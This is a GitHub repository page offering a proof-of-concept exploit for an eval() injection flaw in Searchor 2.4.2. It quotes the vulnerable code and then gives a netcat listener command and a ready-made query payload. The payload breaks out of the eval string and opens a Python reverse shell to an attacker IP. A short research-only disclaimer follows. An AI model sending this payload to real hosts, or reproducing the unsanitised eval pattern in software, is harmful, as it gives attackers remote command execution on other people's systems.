Skip to content

jonnyzar/POC-Searchor-2.4.2

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 

Repository files navigation

POC-Searchor-2.4.2 Exploit

Vulnerable code includes eval() method:

url = eval(
            f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"
        )

If user parameter query is not sanitized it leads to RCE.

  • Exploit code for linux target
  1. Prepare a listener: nc -lvnp PORT
  2. send this as query parameter to the tested host

', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#

DISCLAIMER

  • this is posted for research purpose only
  • use the newest Searcher version to be safe: https:/I/github.com/ArjunSharda/Searchor
  • using this against other web sites is subject to criminal punishment!

About

eval() Exploit POC for Searchor 2.4.2 and lower

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published